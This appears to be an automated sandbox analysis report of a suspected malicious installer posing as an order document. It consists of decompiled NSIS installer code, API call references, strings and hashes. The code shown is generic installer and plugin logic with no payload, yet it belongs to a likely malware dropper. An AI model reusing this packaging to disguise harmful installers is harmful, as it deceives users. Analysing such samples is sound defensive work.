							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405A31(_t146);
								_t125 =  *((intOrPtr*)( *0x424734 + 0x11c));
								if( *((intOrPtr*)( *0x424734 + 0x11c)) != 0 && _t146 == "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Sigtelinjens\\Tvtningerne") {
									E004060BB(_t146, 0x420d30, _t166, 0, _t125);
									if(lstrcmpiA(0x4236c0, 0x420d30) != 0) {
										lstrcatA(_t146, 0x4236c0);
									}
								}
								 *0x420d20 =  *0x420d20 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					} else {
						_a8 = 0x40f;
						goto L12;
					}
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405A9E(_t146) != 0 && E00405ACA(_t146) == 0) {
						E00405A31(_t146);
					}
					 *0x423ef8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E0040415A(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E0040415A(_t166);
					E0040418F(_t165);
					_t138 = E00406431(7);
					if(_t138 == 0) {
						L53:
						return E004041C1(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x004045ca
0x004045d0
0x004045d6
0x004045e3
0x004045f1
0x004045f4
0x004045fc
0x00404602
0x00404602
0x0040460e
0x00404611
0x0040467f
0x00404686
0x0040475d
0x00404764
0x00404773
0x00404773
0x00404777
0x00404781
0x0040478e
0x00404790
0x00404790
0x0040479e
0x004047a5
0x004047ac
0x004047af
0x004047e6
0x004047e8
0x004047ee
0x004047f3
0x004047f7
0x004047f9
0x004047f9
0x00404815
0x00000000
0x00404817
0x0040481a
0x00404828
0x0040482e
0x0040482f
0x00404832
0x00404835
0x00000000
0x00404835
0x004047b1
0x004047b3
0x004047b7
0x00000000
0x00000000
0x00000000
0x00000000
0x004047b9
0x004047b9
0x004047c6
0x004047cb
0x00000000
0x00000000
0x004047cf
0x004047d1
0x004047d1
0x004047d9
0x004047db
0x004047de
0x004047e1
0x004047e4
0x00000000
0x00000000
0x00000000
0x00000000
0x004047e4
0x00404841
0x0040484b
0x0040484e
0x00404851
0x00404858
0x00404858
0x0040485a
0x0040485a
0x0040485f
0x00404861
0x00404869
0x00404870
0x00404872
0x0040487d
0x0040487d
0x00404872
0x00404884
0x0040488d
0x00404897
0x0040489f
0x004048ba
0x004048a1
0x004048aa
0x004048aa
0x0040489f
0x004048bf
0x004048c4
0x004048c9
0x004048d2
0x004048d2
0x004048db
0x004048dd
0x004048dd
0x004048e9
0x004048f1
0x004048f3
0x004048f9
0x004048fb
0x004048fb
0x004048f9
0x00404900
0x00000000
0x00404900
0x004047af
0x00404766
0x0040476d
0x00000000
0x00000000
0x00000000
0x0040476d
0x0040468c
0x00404695
0x004046af
0x004046b4
0x004046be
0x004046c5
0x004046d1
0x004046d4
0x004046d7
0x004046de
0x004046e6
0x004046e9
0x004046ed
0x004046f4
0x004046fc
0x00404756
0x004046fe
0x004046ff
0x00404706
0x00404710
0x00404718
0x00404725
0x00404739
0x0040473d
0x0040473d
0x00404739
0x00404742
0x0040474f
0x0040474f
0x004046fc
0x00000000
0x004046b4
0x004046a2
0x00000000
0x004046a8
0x004046a8
0x00000000
0x004046a8
0x00404613
0x00404620
0x00404629
0x00404636
0x00404636
0x0040463d
0x00404643
0x0040464c
0x0040464f
0x00404652
0x0040465a
0x0040465d
0x00404660
0x00404666
0x0040466d
0x00404674
0x00404906
0x00404918
0x0040467a
0x0040467d
0x00000000
0x0040467d
0x00404674

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404619
SetWindowTextA.USER32(00000000,?), ref: 00404643
SHBrowseForFolderA.SHELL32(?,00420108,?), ref: 004046F4
CoTaskMemFree.OLE32(00000000), ref: 004046FF
lstrcmpiA.KERNEL32(Call,Borerig Setup: Installing), ref: 00404731
lstrcatA.KERNEL32(?,Call), ref: 0040473D
SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040474F

Part of subcall function 00405799: GetDlgItemTextA.USER32(?,?,00000400,00404786), ref: 004057AC

Part of subcall function 00406303: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" ,77313410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040635B
Part of subcall function 00406303: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406368
Part of subcall function 00406303: CharNextA.USER32(?,"C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" ,77313410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040636D
Part of subcall function 00406303: CharPrevA.USER32(?,?,77313410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040637D

GetDiskFreeSpaceA.KERNEL32(0041FD00,?,?,0000040F,?,0041FD00,0041FD00,?,00000001,0041FD00,?,?,000003FB,?), ref: 0040480D
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404828

Part of subcall function 00404981: lstrlenA.KERNEL32(Borerig Setup: Installing,Borerig Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040489C,000000DF,00000000,00000400,?), ref: 00404A1F
Part of subcall function 00404981: wsprintfA.USER32 ref: 00404A27
Part of subcall function 00404981: SetDlgItemTextA.USER32(?,Borerig Setup: Installing), ref: 00404A3A

Strings

Borerig Setup: Installing, xrefs: 004046C7, 0040472A
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne, xrefs: 0040471A
A, xrefs: 004046ED
Call, xrefs: 0040472B, 00404730, 0040473B

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$Borerig Setup: Installing$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne$Call
API String ID: 2624150263-2461342143
Opcode ID: 76c1ef681dfc1789dea454b52c729533340df3c35bc87fe95344eb3cb4d70c23
Instruction ID: 615b1c7bc5a39f2962dd47e2389a1e1cc3dfb76fea7d39b1cb42eedec06edaaa
Opcode Fuzzy Hash: 76c1ef681dfc1789dea454b52c729533340df3c35bc87fe95344eb3cb4d70c23
Instruction Fuzzy Hash: E4A19FB1900209ABDB11EFA5CC85AAFB7B8EF85314F10843BF611B62D1D77C89418B69

Uniqueness

Uniqueness Score: -1.00%

Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001A5D() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				CHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				CHAR* _t198;
				signed int _t201;
				void* _t203;
				void* _t205;
				CHAR* _t207;
				void* _t215;
				struct HINSTANCE__* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t219;
				signed short _t221;
				struct HINSTANCE__* _t224;
				struct HINSTANCE__* _t226;
				void* _t227;
				char* _t228;
				void* _t239;
				signed char _t240;
				signed int _t241;
				struct HINSTANCE__* _t247;
				void* _t248;
				signed int _t250;
				signed int _t252;
				signed int _t258;
				void* _t259;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed char _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed char _t307;
				signed int _t308;
				CHAR* _t309;
				CHAR* _t311;
				CHAR* _t312;
				struct HINSTANCE__* _t313;
				void* _t315;
				signed int _t316;
				void* _t317;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t317 = 0;
				_v48 = 0;
				_t198 = E10001215();
				_v24 = _t198;
				_v28 = _t198;
				_v44 = E10001215();
				_t308 = E1000123B();
				_v52 = _t308;
				_v12 = _t308;
				while(1) {
					_t201 = _v32;
					_v56 = _t201;
					if(_t201 != _t283 && _t317 == _t283) {
						break;
					}
					_t307 =  *_t308;
					_t286 = _t307;
					_t203 = _t286 - _t283;
					if(_t203 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t205 = _v56 - _t283;
						if(_t205 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t317 - _t283;
							if(_t317 == _t283) {
								_t317 = GlobalAlloc(0x40, 0x14a4);
								 *(_t317 + 0x810) = _t283;
								 *(_t317 + 0x814) = _t283;
							}
							_t287 = _v36;
							_t43 = _t317 + 8; // 0x8
							_t207 = _t43;
							_t44 = _t317 + 0x408; // 0x408
							_t309 = _t44;
							 *_t317 = _t287;
							 *_t207 =  *_t207 & 0x00000000;
							 *(_t317 + 0x808) = _t283;
							 *_t309 =  *_t309 & 0x00000000;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *(_t317 + 0x80c) = _t283;
							 *(_t317 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t315 = 0;
								GlobalFree(_t317);
								_t317 = E100012FE(_v24);
								__eflags = _t317 - _t283;
								if(_t317 == _t283) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t239 =  *(_t317 + 0x14a0);
									__eflags = _t239 - _t283;
									if(_t239 == _t283) {
										break;
									}
									_t315 = _t317;
									_t317 = _t239;
									__eflags = _t317 - _t283;
									if(_t317 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t315 - _t283;
								if(_t315 != _t283) {
									 *(_t315 + 0x14a0) = _t283;
								}
								_t240 =  *(_t317 + 0x810);
								__eflags = _t240 & 0x00000008;
								if((_t240 & 0x00000008) == 0) {
									_t241 = _t240 | 0x00000002;
									__eflags = _t241;
									 *(_t317 + 0x810) = _t241;
								} else {
									_t317 = E10001534(_t317);
									 *(_t317 + 0x810) =  *(_t317 + 0x810) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L28:
									lstrcpyA(_t207, _v44);
									L29:
									lstrcpyA(_t309, _v24);
									L39:
									_v12 = _v12 + 1;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t308 = _v12;
										continue;
									}
									break;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L29;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t205 != 1) {
							goto L39;
						}
						_t247 = _v16;
						if(_v40 == _t283) {
							_t247 = _t247 - 1;
						}
						 *(_t317 + 0x814) = _t247;
						goto L39;
					}
					_t248 = _t203 - 0x23;
					if(_t248 == 0) {
						__eflags = _t308 - _v52;
						if(_t308 <= _v52) {
							L15:
							_v32 = _t283;
							_v36 = _t283;
							goto L17;
						}
						__eflags =  *((char*)(_t308 - 1)) - 0x3a;
						if( *((char*)(_t308 - 1)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							L40:
							_t250 = _v32 - _t283;
							__eflags = _t250;
							if(_t250 == 0) {
								__eflags = _t307 - 0x2a;
								if(_t307 == 0x2a) {
									_v36 = 2;
									L61:
									_t308 = _v12;
									_v28 = _v24;
									_t283 = 0;
									__eflags = 0;
									L62:
									_t316 = _t308 + 1;
									__eflags = _t316;
									_v12 = _t316;
									goto L63;
								}
								__eflags = _t307 - 0x2d;
								if(_t307 == 0x2d) {
									L132:
									_t252 = _t308 + 1;
									__eflags =  *_t252 - 0x3e;
									if( *_t252 != 0x3e) {
										L134:
										_t252 = _t308 + 1;
										__eflags =  *_t252 - 0x3a;
										if( *_t252 != 0x3a) {
											L141:
											_v28 =  &(_v28[1]);
											 *_v28 = _t307;
											goto L62;
										}
										__eflags = _t307 - 0x2d;
										if(_t307 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t252;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 =  *_v44 & 0x00000000;
										} else {
											 *_v28 =  *_v28 & 0x00000000;
											lstrcpyA(_v44, _v24);
										}
										goto L61;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t307 - 0x3a;
								if(_t307 != 0x3a) {
									goto L141;
								}
								__eflags = _t307 - 0x2d;
								if(_t307 != 0x2d) {
									goto L134;
								}
								goto L132;
							}
							_t258 = _t250 - 1;
							__eflags = _t258;
							if(_t258 == 0) {
								L74:
								_t259 = _t286 - 0x22;
								__eflags = _t259 - 0x55;
								if(_t259 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t259 + 0x1000215a) & 0x000000ff) * 4 +  &M100020F6))) {
									case 0:
										__eax = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											_v12 = __edi;
											__cl =  *__edi;
											__eflags = __cl - __dl;
											if(__cl != __dl) {
												goto L116;
											}
											L115:
											__eflags =  *(__edi + 1) - __dl;
											if( *(__edi + 1) != __dl) {
												L120:
												 *__eax =  *__eax & 0x00000000;
												__ebx = E10001224(_v24);
												goto L91;
											}
											L116:
											__eflags = __cl;
											if(__cl == 0) {
												goto L120;
											}
											__eflags = __cl - __dl;
											if(__cl == __dl) {
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__cl =  *__edi;
											 *__eax =  *__edi;
											__eax = __eax + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__cl =  *__edi;
											__eflags = __cl - __dl;
											if(__cl != __dl) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 1;
										__ebx = E10001215();
										 &_v12 = E100019FB( &_v12);
										__eax = E10001429(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E100019FB( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(3);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x818) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x828) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E100019FB( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x81c)) = _v8;
											_t133 = _v16 + 0x41; // 0x41
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x830)) = 0;
											 *((intOrPtr*)(__edi + 0x82c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t261 =  *(_t317 + 0x814);
										__eflags = _t261 - _v16;
										if(_t261 > _v16) {
											_v16 = _t261;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t261 - (_v36 == 3);
										if(_t261 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E100019FB( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x82c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x830; // 0x830
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t262 = _t258 - 1;
							__eflags = _t262;
							if(_t262 == 0) {
								_v16 = _t283;
								goto L74;
							}
							__eflags = _t262 != 1;
							if(_t262 != 1) {
								goto L141;
							}
							_t265 = _t286 - 0x21;
							__eflags = _t265;
							if(_t265 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t266 = _t265 - 0x42;
							__eflags = _t266;
							if(_t266 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t317 + 0x810;
									 *_t92 =  *(_t317 + 0x810) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t317 + 0x810) =  *(_t317 + 0x810) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t271 = _t266;
							__eflags = _t271;
							if(_t271 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t272 = _t271 - 9;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(8);
								goto L56;
							}
							_t273 = _t272 - 4;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(4);
								goto L56;
							}
							_t274 = _t273 - 1;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t274 != 0;
							if(_t274 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t277 = _t248 - 5;
					if(_t277 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t283;
						_v20 = _t283;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t283;
						goto L17;
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						_v32 = 2;
						_v8 = _t283;
						_v20 = _t283;
						goto L17;
					}
					if(_t281 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t317 == _t283 ||  *(_t317 + 0x80c) != _t283) {
					L161:
					return _t317;
				} else {
					_t215 =  *_t317 - 1;
					if(_t215 == 0) {
						_t178 = _t317 + 8; // 0x8
						_t311 = _t178;
						__eflags =  *_t311;
						if( *_t311 != 0) {
							_t216 = GetModuleHandleA(_t311);
							__eflags = _t216 - _t283;
							 *(_t317 + 0x808) = _t216;
							if(_t216 != _t283) {
								L150:
								_t183 = _t317 + 0x408; // 0x408
								_t312 = _t183;
								_t217 = E100015A4( *(_t317 + 0x808), _t312);
								__eflags = _t217 - _t283;
								 *(_t317 + 0x80c) = _t217;
								if(_t217 == _t283) {
									__eflags =  *_t312 - 0x23;
									if( *_t312 == 0x23) {
										_t186 = _t317 + 0x409; // 0x409
										_t221 = E100012FE(_t186);
										__eflags = _t221 - _t283;
										if(_t221 != _t283) {
											__eflags = _t221 & 0xffff0000;
											if((_t221 & 0xffff0000) == 0) {
												 *(_t317 + 0x80c) = GetProcAddress( *(_t317 + 0x808), _t221 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t283;
								if(_v48 != _t283) {
									L157:
									_t312[lstrlenA(_t312)] = 0x41;
									_t219 = E100015A4( *(_t317 + 0x808), _t312);
									__eflags = _t219 - _t283;
									if(_t219 != _t283) {
										L145:
										 *(_t317 + 0x80c) = _t219;
										goto L161;
									}
									__eflags =  *(_t317 + 0x80c) - _t283;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t196 = _t317 + 4;
									 *_t196 =  *(_t317 + 4) | 0xffffffff;
									__eflags =  *_t196;
									goto L161;
								} else {
									__eflags =  *(_t317 + 0x80c) - _t283;
									if( *(_t317 + 0x80c) != _t283) {
										goto L161;
									}
									goto L157;
								}
							}
							_t224 = LoadLibraryA(_t311);
							__eflags = _t224 - _t283;
							 *(_t317 + 0x808) = _t224;
							if(_t224 == _t283) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t317 + 0x408; // 0x408
						_t226 = E100012FE(_t179);
						 *(_t317 + 0x80c) = _t226;
						__eflags = _t226 - _t283;
						goto L159;
					}
					_t227 = _t215 - 1;
					if(_t227 == 0) {
						_t176 = _t317 + 0x408; // 0x408
						_t228 = _t176;
						__eflags =  *_t228;
						if( *_t228 == 0) {
							goto L161;
						}
						_t219 = E100012FE(_t228);
						L144:
						goto L145;
					}
					if(_t227 != 1) {
						goto L161;
					}
					_t80 = _t317 + 8; // 0x8
					_t284 = _t80;
					_t313 = E100012FE(_t80);
					 *(_t317 + 0x808) = _t313;
					if(_t313 == 0) {
						goto L160;
					}
					 *(_t317 + 0x84c) =  *(_t317 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t317 + 0x850)) = E10001224(_t284);
					 *(_t317 + 0x83c) =  *(_t317 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t317 + 0x848)) = 1;
					 *((intOrPtr*)(_t317 + 0x838)) = 1;
					_t89 = _t317 + 0x408; // 0x408
					_t219 =  *(_t313->i + E100012FE(_t89) * 4);
					goto L144;
				}
			}

0x10001a65
0x10001a68
0x10001a6b
0x10001a6e
0x10001a71
0x10001a74
0x10001a77
0x10001a79
0x10001a7c
0x10001a81
0x10001a84
0x10001a8c
0x10001a94
0x10001a96
0x10001a99
0x10001aa1
0x10001aa1
0x10001aa6
0x10001aa9
0x00000000
0x00000000
0x10001ab3
0x10001ab5
0x10001aba
0x10001abc
0x10001b2e
0x10001b2e
0x10001b2e
0x10001b32
0x10001b35
0x10001b37
0x10001b59
0x10001b5c
0x10001b5e
0x10001b6d
0x10001b6f
0x10001b75
0x10001b75
0x10001b7b
0x10001b7e
0x10001b7e
0x10001b81
0x10001b81
0x10001b87
0x10001b89
0x10001b8c
0x10001b92
0x10001b95
0x10001b95
0x10001b97
0x10001b9d
0x10001ba0
0x10001bc4
0x10001bc7
0x00000000
0x00000000
0x10001bca
0x10001bcc
0x10001bda
0x10001bdd
0x10001bdf
0x00000000
0x00000000
0x00000000
0x00000000
0x10001be1
0x10001be1
0x10001be1
0x10001be7
0x10001be9
0x00000000
0x00000000
0x10001beb
0x10001bed
0x10001bef
0x10001bf1
0x00000000
0x00000000
0x00000000
0x10001bf1
0x10001bf3
0x10001bf5
0x10001bf7
0x10001bf7
0x10001bfd
0x10001c03
0x10001c05
0x10001c19
0x10001c19
0x10001c1b
0x10001c07
0x10001c0d
0x10001c10
0x10001c10
0x00000000
0x10001ba2
0x10001ba2
0x10001ba2
0x10001ba3
0x10001bab
0x10001baf
0x10001bb5
0x10001bb9
0x10001c21
0x10001c24
0x10001c27
0x10001cb1
0x10001cb5
0x10001a9e
0x00000000
0x10001a9e
0x00000000
0x10001cb5
0x10001ba5
0x10001ba5
0x10001ba6
0x00000000
0x00000000
0x10001ba8
0x10001ba9
0x00000000
0x00000000
0x00000000
0x10001ba9
0x10001ba0
0x10001b3a
0x00000000
0x00000000
0x10001b43
0x10001b46
0x10001b53
0x10001b53
0x10001b48
0x00000000
0x10001b48
0x10001abe
0x10001ac1
0x10001b12
0x10001b15
0x10001b26
0x10001b26
0x10001b29
0x00000000
0x10001b29
0x10001b17
0x10001b1b
0x00000000
0x00000000
0x10001b1d
0x10001b20
0x10001c2f
0x10001c32
0x10001c32
0x10001c34
0x10001f7a
0x10001f7d
0x10001fe0
0x10001ca2
0x10001ca5
0x10001ca8
0x10001cab
0x10001cab
0x10001cad
0x10001cad
0x10001cad
0x10001cae
0x00000000
0x10001cae
0x10001f7f
0x10001f82
0x10001f8e
0x10001f8e
0x10001f91
0x10001f94
0x10001f9f
0x10001f9f
0x10001fa2
0x10001fa5
0x10001fec
0x10001fef
0x10001ff2
0x00000000
0x10001ff2
0x10001fa7
0x10001faa
0x00000000
0x00000000
0x10001fac
0x10001fb3
0x10001fb3
0x10001fb9
0x10001fbc
0x10001fd8
0x10001fbe
0x10001fc7
0x10001fca
0x10001fca
0x00000000
0x10001fbc
0x10001f96
0x00000000
0x10001f96
0x10001f84
0x10001f87
0x00000000
0x00000000
0x10001f89
0x10001f8c
0x00000000
0x00000000
0x00000000
0x10001f8c
0x10001c3a
0x10001c3a
0x10001c3b
0x10001d6a
0x10001d6a
0x10001d6f
0x10001d72
0x00000000
0x00000000
0x10001d7f
0x00000000
0x10001f22
0x10001f25
0x10001f28
0x10001f28
0x10001f29
0x10001f2c
0x10001f2e
0x10001f30
0x00000000
0x00000000
0x10001f32
0x10001f32
0x10001f35
0x10001f47
0x10001f4a
0x10001f53
0x00000000
0x10001f53
0x10001f37
0x10001f37
0x10001f39
0x00000000
0x00000000
0x10001f3b
0x10001f3d
0x10001f3f
0x10001f3f
0x10001f3f
0x10001f40
0x10001f42
0x10001f44
0x10001f28
0x10001f29
0x10001f2c
0x10001f2e
0x10001f30
0x00000000
0x00000000
0x00000000
0x10001f30
0x00000000
0x10001dc6
0x00000000
0x00000000
0x10001dd2
0x00000000
0x00000000
0x10001db9
0x10001dbd
0x10001dc1
0x00000000
0x00000000
0x10001ef4
0x10001ef8
0x00000000
0x00000000
0x10001efe
0x10001f06
0x10001f0d
0x10001f15
0x00000000
0x00000000
0x10001e91
0x10001e91
0x00000000
0x00000000
0x10001ddb
0x00000000
0x00000000
0x10001f72
0x00000000
0x00000000
0x10001f62
0x00000000
0x00000000
0x10001f66
0x00000000
0x00000000
0x10001f6e
0x00000000
0x00000000
0x10001eb4
0x00000000
0x00000000
0x10001e99
0x10001e9b
0x00000000
0x00000000
0x10001ebc
0x00000000
0x00000000
0x10001ea1
0x00000000
0x00000000
0x10001ea5
0x00000000
0x00000000
0x10001f6a
0x10001f74
0x10001f74
0x00000000
0x00000000
0x10001ec4
0x10001ec8
0x10001ecd
0x10001ed0
0x10001ed1
0x10001ed4
0x10001eda
0x10001eda
0x00000000
0x00000000
0x10001f5a
0x00000000
0x00000000
0x10001ea9
0x10001eac
0x10001eae
0x00000000
0x00000000
0x10001de2
0x10001de2
0x00000000
0x00000000
0x10001eb8
0x10001ebe
0x10001ebe
0x10001de4
0x10001de4
0x10001de7
0x10001dee
0x10001df1
0x10001df3
0x10001df5
0x10001df6
0x10001dfa
0x10001dfd
0x10001e03
0x10001e09
0x10001e09
0x10001e0b
0x10001e0b
0x10001e0e
0x10001e14
0x10001e16
0x10001e1a
0x10001e1f
0x10001e1f
0x10001e21
0x10001e21
